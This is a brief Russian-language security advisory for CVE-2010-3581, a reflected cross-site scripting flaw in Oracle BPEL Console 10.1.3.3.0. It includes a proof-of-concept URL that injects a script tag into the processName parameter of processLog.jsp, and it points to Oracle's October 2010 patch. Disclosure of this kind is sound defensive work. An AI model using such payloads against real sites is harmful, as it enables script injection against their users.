CVE-2010-3581

Вендор

Oracle

Продукт

Oracle BPEL Console version 10.1.3.3.0 

Тип уязвимости

Межсайтовый скриптинг

Reported

18.03.2009

Date of Public Advisory

25.10.2010

Автор

Александр Поляков

Детальное описание

Уязвимая страница - BPELConsole/default/processLog.jsp 
Злоумышленник может выполнить XSS, дописав её к URL.

Пример 
**********
http://[localhost]:7777/BPELConsole/default/processLog.jsp?processId=*&revisionTag=*&processName=ssssssssssssssssssss"><script>alert()</script>&eventType=all&eventDate=all 

Решение 
**********
Данная уязвимость исправлена в пакете обновлений, вышедшем 12 октября 2010 года. 
Все заказчики могут скачать и установить обновления, следуя инструкциям из официального Advisory: 
http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html